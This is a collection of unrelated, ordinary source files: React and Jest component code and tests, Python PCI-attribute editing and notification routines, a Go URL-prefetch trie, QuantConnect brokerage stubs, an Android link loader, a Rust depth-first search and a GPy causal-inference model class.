...props, preSignedURL: 'link-to-user-img.com', }) expect(wrapper.render().find('div.SRC-userImgSmall')).toHaveLength(1) }) it("doesn't hide text by default", () => { const { wrapper } = createSmallComponent({ ...props, preSignedURL: 'link-to-user-img.com', }) expect(wrapper.render().find('span.SRC-primary-text-color')).toHaveLength(1) }) it('hides text when hideText is set to true', () => { const { wrapper } = createSmallComponent({ ...props, preSignedURL: 'link-to-user-img.com', hideText: true, }) expect(wrapper.render().find('span.SRC-primary-text-color')).toHaveLength(0) }) }) describe('it creates the correct UI for the medium card', () => { const props = { userProfile: mockUserProfileData, size: SynapseConstants.MEDIUM_USER_CARD, } it('displays an svg for a user without an img', () => { const { wrapper } = createMediumComponent({ ...props }) // one svg is for the clipboard icon, the other is for the user expect(wrapper.render().find('div.SRC-userImg')).toHaveLength(1) expect( wrapper .render() .find('div.SRC-userImg') .text(), ).toEqual(firstName[0]) }) it('displays an img for a user with an img set', () => { const { wrapper } = createMediumComponent({ ...props, preSignedURL: 'my-img-url', }) expect(wrapper.render().find('div.SRC-userImg')).toHaveLength(1) }) it("doesn't hide user email by default", () => { const { wrapper } = createMediumComponent({ ...props }) expect(wrapper.render().find('p.SRC-emailText')).toHaveLength(1) }) it("hide's user email by when hideEmail set ", () => { const { wrapper } = createMediumComponent({ ...props, hideEmail: true }) expect(wrapper.render().find('p.SRC-emailText')).toHaveLength(0) }) it('displays the context menu on toggle', async () => { const menuActions = [ { field: 'text', callback: () => {}, }, ] as MenuAction[] const { wrapper } = createMediumComponent({ ...props, menuActions }) expect(wrapper.render().find('.SRC-menu-wall')).toHaveLength(0) const instance = wrapper.instance() as UserCardMedium const _event = {} as any await instance.toggleContextMenu(_event) expect(wrapper.render().find('div.dropdown')).toHaveLength(1) }) }) describe('it creates the correct UI for the UserCardContextMenu', () => { const props = { userProfile: mockUserProfileData, } it('renders without crashing', () => { const menuActions = [ { field: 'text', callback: () => {}, }, ] as MenuAction[] const { wrapper } = createUserCardContextMenu({ ...props, menuActions }) // one svg is for the clipboard icon, one for the ellipsis, // and one is for the user svg expect(wrapper).toBeDefined() }) it('renders a break with SEPERATOR in menuActions', () => { const menuActions = [ { field: 'text', callback: () => {}, }, { field: SEPERATOR, callback: () => {}, }, { field: 'other text', callback: () => {}, }, ] as MenuAction[] const { wrapper } = createUserCardContextMenu({ ...props, menuActions }) expect(wrapper.find('hr.SRC-break')).toHaveLength(1) }) }) describe('it creates the correct UI for the large card', () => { const props = { userProfile: mockUserProfileData, size: SynapseConstants.LARGE_USER_CARD, } it("displays the user's information", async () => { const { wrapper } = createLargeComponent({ ...props }) expect(wrapper.render().find('div.SRC-cardMetaData')).toHaveLength(1) // only two fields are set for the mock profile, so there should only be two // fields shown expect( wrapper .render() .find('div.SRC-cardMetaData') .children(), ).toHaveLength(2) }) })
<gh_stars>10-100 __all__ = [ "SetDescriptionReferenceAttribute" , "DOp_SetPCIIdAttr" , "DOp_SetAttr" ] from .project_editing import ( DescriptionOperation ) from copy import ( deepcopy as dcp ) from common import ( mlget as _ ) from .pci_ids import ( PCIVendorId, PCIDeviceId, PCIClassId ) class DOp_SetAttr(DescriptionOperation): def __init__(self, attribute_name, new_value, *args, **kw): DescriptionOperation.__init__(self, *args, **kw) self.attr = str(attribute_name) self.val = dcp(new_value) def __read_set__(self): return DescriptionOperation.__read_set__(self) + [ self.sn ] def __write_set__(self): return DescriptionOperation.__write_set__(self) + [ (self.sn, str(self.attr)) ] def _backup(self): self.old_val = dcp(getattr(self.find_desc(), self.attr)) def _do(self): setattr(self.find_desc(), self.attr, dcp(self.val)) def _undo(self): setattr(self.find_desc(), self.attr, dcp(self.old_val)) def _description(self): attr = self.attr if attr == "name": name = self.old_val else: name = self.find_desc().name return _("Set '%s' of '%s' to '%s'.") % ( attr, name, str(self.val) ) class SetDescriptionReferenceAttribute(DescriptionOperation): def __init__(self, attribute_name, new_value, *args, **kw): DescriptionOperation.__init__(self, *args, **kw) self.attr = str(attribute_name) self.val = new_value def __read_set__(self): # Note that new referenced value is probably to be in read set. return DescriptionOperation.__read_set__(self) + [ self.sn ] def __write_set__(self): return DescriptionOperation.__write_set__(self) + [ (self.sn, str(self.attr)) ] def _backup(self): self.old_val = getattr(self.find_desc(), self.attr) def _do(self): setattr(self.find_desc(), self.attr, self.val) def _undo(self): setattr(self.find_desc(), self.attr, self.old_val) def get_pci_id_kind_str(pci_id): if type(pci_id) is PCIVendorId: return _("vendor") elif type(pci_id) is PCIDeviceId: return _("device") elif type(pci_id) is PCIClassId: return _("class") def gen_pci_id_str(pci_id): return _("%s %s (%s)") % ( get_pci_id_kind_str(pci_id), pci_id.name, pci_id.id ) class DOp_SetPCIIdAttr(SetDescriptionReferenceAttribute): def _description(self): name = self.find_desc().name if self.old_val is None: return _("Set '%s' of '%s' to %s") % ( self.attr, name, gen_pci_id_str(self.val) ) elif self.val is None: return _("Reset '%s' of '%s'.") % (self.attr, name) else: return _("Change '%s' of '%s' from %s to %s") % ( self.attr, name, gen_pci_id_str(self.old_val), gen_pci_id_str(self.val) )
package prefetcher // TODO visability import ( "fmt" ) type node struct { URI string AccessFreq int // TODO change this to a linked list? Children []*node } func newNode(URI string) *node { return &node{URI: URI, AccessFreq: 0} } func (n *node) getChild(URI string) *node { for _, child := range n.Children { if child.URI == URI { return child } } return nil } func (n *node) addChild(child *node) { n.Children = append(n.Children, child) } // TODO remove func (n *node) printChilderen() { for _, c := range n.Children { fmt.Print(c.URI, " ") } fmt.Println(" ") } // TODO naming; this is a bit more than just a trie /* suffix trie */ type Trie struct { root *node curentTrace circulairArray savedTrace []string uid string } func NewTrie(uid string) *Trie { t := Trie{ root: nil, curentTrace: newCirculairArray(), uid: uid, } t.buildTrie() return &t } func (t *Trie) SaveTrie() error { return writeUserTrace(t.uid, t.curentTrace.getDataAsSlice()) } func (t *Trie) ProcessRequest(URI string) { t.curentTrace.pushBack(URI) t.predictNext(true) } func (t *Trie) buildTrie() { t.savedTrace, _ = getUserTrace(t.uid) t.root = newNode("root") for i := 0; i < len(t.savedTrace); i++ { t.addSuffix(i) } } func (t *Trie) addSuffix(pos int) { currentNode := t.root var nextNode *node // TODO is using slices efficient enough? see also predict next for _, URI := range (t.savedTrace)[pos:] { nextNode = currentNode.getChild(URI) if nextNode == nil { nextNode = newNode(URI) currentNode.addChild(nextNode) } currentNode = nextNode } } // TODO refactor func (t *Trie) predictNext(recursive bool) { trace := t.curentTrace.getDataAsSlice() var currentNode *node var matched bool fmt.Println(t.curentTrace.getDataAsSlice()) for i := 0; i < len(trace); i++ { if len(trace)-i < MIN_URI_MATCHES { break } currentNode = t.root matched = true fmt.Println("Matching: ", trace[i:]) for _, URI := range trace[i:] { currentNode = currentNode.getChild(URI) if currentNode == nil { matched = false break } } if !recursive || matched { fmt.Print("Matched in ", i, "th iteration") break } } if currentNode == nil { fmt.Println("pattern not matched") } else { currentNode.printChilderen() } }
<reponame>gaoxiaojun/Lean from .__Brokerages_1 import * import typing import System.Collections.Generic import System import QuantConnect.Securities import QuantConnect.Packets import QuantConnect.Orders.Slippage import QuantConnect.Orders.Fills import QuantConnect.Orders.Fees import QuantConnect.Orders import QuantConnect.Interfaces import QuantConnect.Data.Market import QuantConnect.Brokerages import QuantConnect import datetime # no functions # classes class DefaultBrokerageModel(System.object, QuantConnect.Brokerages.IBrokerageModel): """ Provides a default implementation of QuantConnect.Brokerages.IBrokerageModel that allows all orders and uses the default transaction models DefaultBrokerageModel(accountType: AccountType) """ def ApplySplit(self, tickets: typing.List[QuantConnect.Orders.OrderTicket], split: QuantConnect.Data.Market.Split) -> None: pass def CanExecuteOrder(self, security: QuantConnect.Securities.Security, order: QuantConnect.Orders.Order) -> bool: pass def CanSubmitOrder(self, security: QuantConnect.Securities.Security, order: QuantConnect.Orders.Order, message: QuantConnect.Brokerages.BrokerageMessageEvent) -> bool: pass def CanUpdateOrder(self, security: QuantConnect.Securities.Security, order: QuantConnect.Orders.Order, request: QuantConnect.Orders.UpdateOrderRequest, message: QuantConnect.Brokerages.BrokerageMessageEvent) -> bool: pass @typing.overload def GetBuyingPowerModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Securities.IBuyingPowerModel: pass @typing.overload def GetBuyingPowerModel(self, security: QuantConnect.Securities.Security, accountType: QuantConnect.AccountType) -> QuantConnect.Securities.IBuyingPowerModel: pass def GetBuyingPowerModel(self, *args) -> QuantConnect.Securities.IBuyingPowerModel: pass def GetFeeModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fees.IFeeModel: pass def GetFillModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fills.IFillModel: pass def GetLeverage(self, security: QuantConnect.Securities.Security) -> float: pass @typing.overload def GetSettlementModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Securities.ISettlementModel: pass @typing.overload def GetSettlementModel(self, security: QuantConnect.Securities.Security, accountType: QuantConnect.AccountType) -> QuantConnect.Securities.ISettlementModel: pass def GetSettlementModel(self, *args) -> QuantConnect.Securities.ISettlementModel: pass def GetSlippageModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Slippage.ISlippageModel: pass def __init__(self, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.DefaultBrokerageModel: pass AccountType: QuantConnect.AccountType DefaultMarkets: System.Collections.Generic.IReadOnlyDictionary[QuantConnect.SecurityType, str] RequiredFreeBuyingPowerPercent: float DefaultMarketMap: ReadOnlyDictionary[SecurityType, str] class AlpacaBrokerageModel(QuantConnect.Brokerages.DefaultBrokerageModel, QuantConnect.Brokerages.IBrokerageModel): """ Alpaca Brokerage Model Implementation for Back Testing. AlpacaBrokerageModel(orderProvider: IOrderProvider, accountType: AccountType) """ def CanSubmitOrder(self, security: QuantConnect.Securities.Security, order: QuantConnect.Orders.Order, message: QuantConnect.Brokerages.BrokerageMessageEvent) -> bool: pass def GetFeeModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fees.IFeeModel: pass def GetFillModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fills.IFillModel: pass def GetSlippageModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Slippage.ISlippageModel: pass def __init__(self, orderProvider: QuantConnect.Securities.IOrderProvider, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.AlpacaBrokerageModel: pass DefaultMarkets: System.Collections.Generic.IReadOnlyDictionary[QuantConnect.SecurityType, str] DefaultMarketMap: ReadOnlyDictionary[SecurityType, str] class AlphaStreamsBrokerageModel(QuantConnect.Brokerages.DefaultBrokerageModel, QuantConnect.Brokerages.IBrokerageModel): """ Provides properties specific to Alpha Streams AlphaStreamsBrokerageModel(accountType: AccountType) """ def GetFeeModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fees.IFeeModel: pass def GetLeverage(self, security: QuantConnect.Securities.Security) -> float: pass @typing.overload def GetSettlementModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Securities.ISettlementModel: pass @typing.overload def GetSettlementModel(self, security: QuantConnect.Securities.Security, accountType: QuantConnect.AccountType) -> QuantConnect.Securities.ISettlementModel: pass def GetSettlementModel(self, *args) -> QuantConnect.Securities.ISettlementModel: pass def GetSlippageModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Slippage.ISlippageModel: pass def __init__(self, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.AlphaStreamsBrokerageModel: pass class BitfinexBrokerageModel(QuantConnect.Brokerages.DefaultBrokerageModel, QuantConnect.Brokerages.IBrokerageModel): """ Provides Bitfinex specific properties BitfinexBrokerageModel(accountType: AccountType) """ @typing.overload def GetBuyingPowerModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Securities.IBuyingPowerModel: pass @typing.overload def GetBuyingPowerModel(self, security: QuantConnect.Securities.Security, accountType: QuantConnect.AccountType) -> QuantConnect.Securities.IBuyingPowerModel: pass def GetBuyingPowerModel(self, *args) -> QuantConnect.Securities.IBuyingPowerModel: pass def GetFeeModel(self, security: QuantConnect.Securities.Security) -> QuantConnect.Orders.Fees.IFeeModel: pass def GetLeverage(self, security: QuantConnect.Securities.Security) -> float: pass def __init__(self, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.BitfinexBrokerageModel: pass DefaultMarkets: System.Collections.Generic.IReadOnlyDictionary[QuantConnect.SecurityType, str] class BrokerageFactoryAttribute(System.Attribute, System.Runtime.InteropServices._Attribute): """ Represents the brokerage factory type required to load a data queue handler BrokerageFactoryAttribute(type: Type) """ def __init__(self, type: type) -> QuantConnect.Brokerages.BrokerageFactoryAttribute: pass Type: type class BrokerageMessageEvent(System.object): """ Represents a message received from a brokerage BrokerageMessageEvent(type: BrokerageMessageType, code: int, message: str) BrokerageMessageEvent(type: BrokerageMessageType, code: str, message: str) """ @staticmethod def Disconnected(message: str) -> QuantConnect.Brokerages.BrokerageMessageEvent: pass @staticmethod def Reconnected(message: str) -> QuantConnect.Brokerages.BrokerageMessageEvent: pass def ToString(self) -> str: pass @typing.overload def __init__(self, type: QuantConnect.Brokerages.BrokerageMessageType, code: int, message: str) -> QuantConnect.Brokerages.BrokerageMessageEvent: pass @typing.overload def __init__(self, type: QuantConnect.Brokerages.BrokerageMessageType, code: str, message: str) -> QuantConnect.Brokerages.BrokerageMessageEvent: pass def __init__(self, *args) -> QuantConnect.Brokerages.BrokerageMessageEvent: pass Code: str Message: str Type: QuantConnect.Brokerages.BrokerageMessageType class BrokerageMessageType(System.Enum, System.IConvertible, System.IFormattable, System.IComparable): """ Specifies the type of message received from an IBrokerage implementation enum BrokerageMessageType, values: Disconnect (4), Error (2), Information (0), Reconnect (3), Warning (1) """ value__: int Disconnect: 'BrokerageMessageType' Error: 'BrokerageMessageType' Information: 'BrokerageMessageType' Reconnect: 'BrokerageMessageType' Warning: 'BrokerageMessageType' class BrokerageModel(System.object): """ Provides factory method for creating an QuantConnect.Brokerages.IBrokerageModel from the QuantConnect.Brokerages.BrokerageName enum """ @staticmethod def Create(orderProvider: QuantConnect.Securities.IOrderProvider, brokerage: QuantConnect.Brokerages.BrokerageName, accountType: QuantConnect.AccountType) -> QuantConnect.Brokerages.IBrokerageModel: pass __all__: list class BrokerageName(System.Enum, System.IConvertible, System.IFormattable, System.IComparable): """ Specifices what transaction model and submit/execution rules to use enum BrokerageName, values: Alpaca (13), AlphaStreams (14), Bitfinex (5), Default (0), FxcmBrokerage (4), GDAX (12), InteractiveBrokersBrokerage (1), OandaBrokerage (3), QuantConnectBrokerage (0), TradierBrokerage (2) """ value__: int Alpaca: 'BrokerageName' AlphaStreams: 'BrokerageName' Bitfinex: 'BrokerageName' Default: 'BrokerageName' FxcmBrokerage: 'BrokerageName' GDAX: 'BrokerageName' InteractiveBrokersBrokerage: 'BrokerageName' OandaBrokerage: 'BrokerageName' QuantConnectBrokerage: 'BrokerageName' TradierBrokerage: 'BrokerageName' class DefaultBrokerageMessageHandler(System.object, QuantConnect.Brokerages.IBrokerageMessageHandler): """ Provides a default implementation o QuantConnect.Brokerages.IBrokerageMessageHandler that will forward messages as follows: Information -> IResultHandler.Debug Warning -> IResultHandler.Error && IApi.SendUserEmail Error -> IResultHandler.Error && IAlgorithm.RunTimeError DefaultBrokerageMessageHandler(algorithm: IAlgorithm, job: AlgorithmNodePacket, api: IApi, initialDelay: Nullable[TimeSpan], openThreshold: Nullable[TimeSpan]) """ def Handle(self, message: QuantConnect.Brokerages.BrokerageMessageEvent) -> None: pass def __init__(self, algorithm: QuantConnect.Interfaces.IAlgorithm, job: QuantConnect.Packets.AlgorithmNodePacket, api: QuantConnect.Interfaces.IApi, initialDelay: typing.Optional[datetime.timedelta], openThreshold: typing.Optional[datetime.timedelta]) -> QuantConnect.Brokerages.DefaultBrokerageMessageHandler: pass
package com.macindex.macindex; import android.app.AlertDialog; import android.content.Context; import android.net.Uri; import android.view.LayoutInflater; import android.view.View; import android.widget.RadioButton; import android.widget.RadioGroup; import android.widget.Toast; import androidx.browser.customtabs.CustomTabsIntent; import androidx.core.content.ContextCompat; class LinkLoadingHelper { public static void loadLinks(final String thisName, final String thisLinks, final Context thisContext) { try { if (thisLinks.equals("null")) { throw new IllegalArgumentException(); } if (thisLinks.equals("N")) { Toast.makeText(thisContext, MainActivity.getRes().getString(R.string.link_not_available), Toast.LENGTH_LONG).show(); return; } final String[] linkGroup = thisLinks.split("html;"); if (linkGroup.length == 1) { // Only one option, launch EveryMac directly. startBrowser(linkGroup[0].split(",http")[0], "http" + linkGroup[0].split(",http")[1], thisContext); } else { // Fix ; and , split bug. for (int i = 0; i < linkGroup.length; i++) { linkGroup[i] = linkGroup[i] + "html"; } final AlertDialog.Builder linkDialog = new AlertDialog.Builder(thisContext); linkDialog.setTitle(thisName); linkDialog.setMessage(MainActivity.getRes().getString(R.string.link_message)); // Setup each option in dialog. final View linkChunk = ((LayoutInflater) thisContext.getSystemService(Context.LAYOUT_INFLATER_SERVICE)).inflate(R.layout.chunk_links, null); final RadioGroup linkOptions = linkChunk.findViewById(R.id.option); for (int i = 0; i < linkGroup.length; i++) { final RadioButton linkOption = new RadioButton(thisContext); linkOption.setText(linkGroup[i].split(",http")[0]); linkOption.setId(i); if (i == 0) { linkOption.setChecked(true); } linkOptions.addView(linkOption); } linkDialog.setView(linkChunk); // When user tapped confirm or cancel... linkDialog.setPositiveButton(MainActivity.getRes().getString(R.string.link_confirm), (dialog, which) -> { try { startBrowser(linkGroup[linkOptions.getCheckedRadioButtonId()] .split(",http")[0], "http" + linkGroup[linkOptions.getCheckedRadioButtonId()] .split(",http")[1], thisContext); } catch (Exception e) { ExceptionHelper.handleException(thisContext, e, null, null); } }); linkDialog.setNegativeButton(MainActivity.getRes().getString(R.string.link_cancel), (dialog, which) -> { // Cancelled. }); linkDialog.show(); } } catch (Exception e) { ExceptionHelper.handleException(thisContext, e, "loadLinks", "Link loading failed!!"); } } public static void startBrowser(final String url, final Context thisContext) { try { CustomTabsIntent.Builder builder = new CustomTabsIntent.Builder(); builder.setToolbarColor(ContextCompat.getColor(thisContext, R.color.colorPrimary)); CustomTabsIntent customTabsIntent = builder.build(); customTabsIntent.launchUrl(thisContext, Uri.parse(url)); } catch (Exception e) { ExceptionHelper.handleException(thisContext, e, "startBrowserCustomTabs", "Failed to open " + url); } } public static void startBrowser(final String thisName, final String url, final Context thisContext) { startBrowser(url, thisContext); Toast.makeText(thisContext, MainActivity.getRes().getString(R.string.link_opening) + thisName, Toast.LENGTH_LONG).show(); } }
/// Returns a tuple of node id lists as result of a Depth-First search from node `start`. /// The first list is the predecessor list, that matches each node to it's predecessor in the /// search path. /// The second list is the order in which nodes are visited by the search algorithm. /// # Arguments /// * `network` a borrowed value that implements the Network trait. /// * `start` a start node from where to search. pub fn depth_first_search<N: Network>(network: &N, start: NodeId) -> (NodeVec, NodeVec) { let n = network.num_nodes(); let mut stack = Stack::with_capacity(n); search(network, &mut stack, start) }
def notify_usage(engine, lab_dict, sub_dict, upd_sub_list, timestamp_utc=None): success = True error = None count = 0 session = session_open(engine) for _, sub_update in enumerate(upd_sub_list): send_notification = False new_details = sub_update[1] if ( new_details.subscription_status.lower() == CONST_SUB_CANCELLED.lower() ): continue notify, usage_code = _usage_notification( new_details.handout_budget, new_details.handout_consumed ) if not notify: continue sub_latest_noti_code = ( session.query(SubscriptionClass) .filter(SubscriptionClass.id == new_details.sub_id) .first() .usage_code ) if sub_latest_noti_code is None: send_notification = True elif usage_code > sub_latest_noti_code: send_notification = True if send_notification: send_success, _ = _notify_usage_sub( session, lab_dict, sub_dict, new_details, usage_code, timestamp_utc=timestamp_utc, ) if send_success: count += 1 session_close(session) return success, error, count
/* eslint-disable */ import * as React from "react"; import EditableInput from "./EditableInput"; import { Button } from "library-simplified-reusable-components"; export interface AnnouncementFormProps { content?: string; start?: string; finish?: string; id?: string; add: (announcement: any) => void; } export interface AnnouncementFormState { content?: string; start?: string; finish?: string; id?: string; } export default class AnnouncementForm extends React.Component< AnnouncementFormProps, AnnouncementFormState > { constructor(props: AnnouncementFormProps) { super(props); this.updateStartDate = this.updateStartDate.bind(this); this.updateEndDate = this.updateEndDate.bind(this); let [start, finish] = this.getDefaultDates(); this.state = { content: this.props.content || "", start: this.props.start || start, finish: this.props.finish || finish, }; } getDefaultDates(): string[] { // By default, the start date is today's date and the end date is two months from today. let today = new Date(); let start = this.formatDate(today); let finish = this.formatDate( new Date(today.setMonth(today.getMonth() + 2)) ); return [start, finish]; } formatDate(date: Date | string): string { if (typeof date === "string" && date.indexOf("/") === -1) { return date; } let [month, day, year] = typeof date === "string" ? date.split("/") : date.toLocaleDateString("en-US").split("/"); return `${year}-${month.toString().length === 1 ? "0" + month : month}-${ day.toString().length === 1 ? "0" + day : day }`; } updateContent(content: string) { this.setState({ content }); } updateStartDate(start: string) { this.setState({ start }); // The first time you change the start date, the end date updates to be two months later. // Presumably, if the end date has already been changed away from the default, then it's already where // you want it, and it would just be annoying/confusing for it to keep jumping around every time you change the start date, if (this.state.finish === this.getDefaultDates()[1]) { let startDate = new Date(start); let newMonth = startDate.getMonth() + 2; let finishDate = startDate.setMonth(newMonth); this.setState({ finish: this.formatDate(new Date(finishDate)) }); } } updateEndDate(finish: string) { this.setState({ finish }); } add(e: Event) { // Add the current announcement to the list of announcements in the parent component (AnnouncementsSection) e.preventDefault(); this.props.add({ content: this.state.content, start: this.state.start, finish: this.state.finish, id: this.props.id || null, }); // Restore the form to default dates and an empty content field. let [start, finish] = this.getDefaultDates(); this.setState({ content: "", start: start, finish: finish }); } cancel(e: Event) { e.preventDefault(); // If an existing announcement was being edited, just put it back into the list. if (this.props.content) { this.add(e); } else { // Blank out the content field and restore the dates to their defaults. let [start, finish] = this.getDefaultDates(); this.setState({ content: "", start: start, finish: finish }); } } componentWillReceiveProps(newProps: AnnouncementFormProps) { // Switch from creating a new announcement to editing an existing one. if (newProps.content?.length > 0) { const { content, start, finish } = newProps; this.setState({ content: content, start: this.formatDate(start), finish: this.formatDate(finish), }); } } render(): JSX.Element { // None of the fields can be blank. Content must be between 15 and 350 characters. let wrongLength = this.state.content.length < 15 || this.state.content.length >= 350; let shouldDisable = () => { if (!this.state.content || !this.state.start || !this.state.finish) { return true; } else if (wrongLength) { return true; } return false; }; return ( <div className="announcement-form"> <EditableInput className={wrongLength && "wrong-length"} elementType="textarea" type="text" minLength={15} maxLength={350} value={this.state.content} label="New Announcement Text (15-350 characters)" optionalText={false} onChange={(e) => this.updateContent(e)} description={`(Current length: ${this.state.content.length}/350)`} /> <EditableInput type="date" max={this.state.finish} value={this.state.start} label="Start Date" optionalText={true} onChange={(e) => this.updateStartDate(e)} description="If no start date is chosen, the default start date is today's date." /> <EditableInput type="date" min={this.state.start} value={this.state.finish} label="End Date" optionalText={true} onChange={(e) => this.updateEndDate(e)} description="If no expiration date is chosen, the default expiration date is 2 months from the start date." /> <Button callback={(e: Event) => this.add(e)} className="inline left-align" disabled={shouldDisable()} /> <Button callback={(e: Event) => this.cancel(e)} content="Cancel" className="inline left-align" /> </div> ); } }
class CMGP: """ An implementation of various Gaussian models for Causal inference building on GPy. """ #---------------------------------------------------------------- #---------------------------------------------------------------- # This method implements the class constructor, automatically # invoked for every class instance #---------------------------------------------------------------- def __init__(self, mode="CMGP", **kwargs): """ Class constructor. Initialize a GP object for causal inference. :mod: ['VirtualTwin'], ['Counterfactual'] or ['Multitask'], default is ['VirtualTwin'] :dim: the dimension of the input. Default is 1 :kern: ['Matern'] or ['RBF'], Default is the Radial Basis Kernel :mkern: For multitask models, can select from IMC and LMC models, default is IMC """ # %%%%%%%%%%%%%%%%% # **Set defaults** # %%%%%%%%%%%%%%%%% self.mod_list = ['VirtualTwin','Counterfactual','Multitask'] self.kern_list = ['RBF','Matern'] self.mkern_list = ['ICM','LCM'] self.mod = self.mod_list[2] self.dim = 1 self.kern = self.kern_list[0] self.mkern = self.mkern_list[0] self.mode = mode self.Bayesian = True self.Confidence = True # ~~~~~~~~~~~~~~~~~~~~~~~ # ** Read input arguments # ~~~~~~~~~~~~~~~~~~~~~~~ if kwargs.__contains__('mod'): self.mod = kwargs['mod'] if kwargs.__contains__('dim'): self.dim = kwargs['dim'] if kwargs.__contains__('kern'): self.kern = kwargs['kern'] if (kwargs.__contains__('mkern')) and (self.mod == self.mod_list[2]): self.mkern = kwargs['mkern'] # ++++++++++++++++++++++++++++++++++++++++++ # ** catch exceptions ** handle wrong inputs # ++++++++++++++++++++++++++++++++++++++++++ try: if (self.dim < 1) or (type(self.dim) != int): raise ValueError('Invalid value for the input dimension! Input dimension has to be a positive integer.') if (self.mod not in self.mod_list) or (self.kern not in self.kern_list) or (self.mkern not in self.mkern_list): raise ValueError('Invalid input!') if (kwargs.__contains__('mkern')) and (self.mod != 'Multitask'): raise ValueError('Invalid input! Multitask kernels are valid only for the Multitask mode') except ValueError: if (self.mod not in self.mod_list): raise ValueError('Invalid input: The provided mode is undefined for class GaussianProcess_Model.') elif (self.kern not in self.kern_list): raise ValueError('Invalid input: The provided kernel is undefined for class GaussianProcess_Model.') elif (self.mkern not in self.mkern_list): raise ValueError('Invalid input: The provided Multitask kernel is undefined for class GaussianProcess_Model.') else: raise ValueError('Invalid input for GaussianProcess_Model!') else: #************************************************************************* # Initialize the kernels and likelihoods depending on the specified model #************************************************************************* if (self.mod == self.mod_list[0]): del self.mkern if(self.kern == self.kern_list[0]): self.ker0 = GPy.kern.RBF(input_dim = self.dim,ARD=True) self.ker1 = GPy.kern.RBF(input_dim = self.dim,ARD=True) else: self.ker0 = GPy.kern.Matern32(input_dim = self.dim,ARD=True) self.ker1 = GPy.kern.Matern32(input_dim = self.dim,ARD=True) self.lik0 = GPy.likelihoods.Gaussian() self.lik1 = GPy.likelihoods.Gaussian() elif (self.mod == self.mod_list[1]): del self.mkern if(self.kern == self.kern_list[0]): self.ker = GPy.kern.RBF(input_dim = self.dim + 1,ARD=True) else: self.ker = GPy.kern.Matern32(input_dim = self.dim + 1,ARD=True) self.lik = GPy.likelihoods.Gaussian() elif (self.mod == self.mod_list[2]): # edit this later if(self.kern == self.kern_list[0]): base_kernel = GPy.kern.RBF(input_dim = self.dim,ARD=True) self.ker = GPy.util.multioutput.ICM(self.dim,2,base_kernel,W_rank=1,W=None,kappa=None,name='ICM') else: self.ker = GPy.kern.Matern32(input_dim = self.dim) self.lik = GPy.likelihoods.Gaussian() #----------------------------------------------------------------------------------------------------------- # This method optimizes the model hyperparameters using the factual samples for the treated and control arms #------------------------------------------------------------------------------------------------------------ # ** Note ** all inputs to this method are positional arguments #--------------------------------------------------------------- def fit(self, X, Y, W): """ Optimizes the model hyperparameters using the factual samples for the treated and control arms. X has to be an N x dim matrix. :X: The input covariates :Y: The corresponding outcomes :W: The treatment assignments """ # ----------------------------------------------------------------- # Inputs: X (the features), Y (outcomes), W (treatment assignments) # X has to be an N x dim matrix. # ----------------------------------------------------------------- # Situate the data in a pandas data frame # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dataset = pd.DataFrame(X) Dataset['Y'] = Y Dataset['W'] = W Xshape = np.array(X).shape Yshape = np.array(Y).shape W_comp = Dataset.loc[Dataset['W'] != 1, 'W'] self.X_train = np.array(X) if (self.dim > 1): Feature_names = list(range(self.dim)) else: Feature_names = 0 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Catch exceptions: handle errors in the input sizes, size mismatches, or undefined # treatment assignments #---------------------- #try: # if (Xshape[1] != self.dim) or (Yshape[1] != 1) or (Xshape[0] != Yshape[0]) or (len(W_comp)>0): # raise ValueError('Invalid Inputs!') #except ValueError: # if (Xshape[1] != self.dim): # raise ValueError('Invalid input: Dimension of input covariates do not match the model dimensions') # elif (Yshape[1] != 1): # raise ValueError('Invalid input: Outcomes must be formatted in a 1D vector.') # elif (Xshape[0] != Yshape[0]): # raise ValueError('Invalid input: Outcomes and covariates do not have the same number of samples.') # elif (len(W_comp)>0): # raise ValueError('Invalid input: Treatment assignment vector has non-binary values.') #else: #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if(self.mod == self.mod_list[0]): Dataset0 = Dataset[Dataset['W']==0].copy() Dataset1 = Dataset[Dataset['W']==1].copy() # Extract data for the first model # ````````````````````````````````````````````````````````````````` X0 = np.reshape(np.array(Dataset0[Feature_names].copy()),(len(Dataset0),self.dim)) y0 = np.reshape(np.array(Dataset0['Y'].copy()),(len(Dataset0),1)) # Extract data for the second model # ````````````````````````````````````````````````````````````````` X1 = np.reshape(np.array(Dataset1[Feature_names].copy()),(len(Dataset1),self.dim)) y1 = np.reshape(np.array(Dataset1['Y'].copy()),(len(Dataset1),1)) self.model = [GPy.core.GP(X0, y0, kernel = self.ker0, likelihood = self.lik0), GPy.core.GP(X1, y1, kernel = self.ker1, likelihood = self.lik1)] self.model[0].optimize(messages=False,max_f_eval = 1000) self.model[1].optimize(messages=False,max_f_eval = 1000) #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ elif(self.mod == self.mod_list[1]): #X = np.array(Dataset[[Feature_names,'W']]) X = np.array(Dataset[Feature_names+['W']]) y = np.reshape(np.array(Dataset['Y']),(len(np.array(Dataset['Y'])),1)) self.model = GPy.core.GP(X, y, kernel = self.ker, likelihood = self.lik) self.model.optimize(messages=False,max_f_eval = 1000) 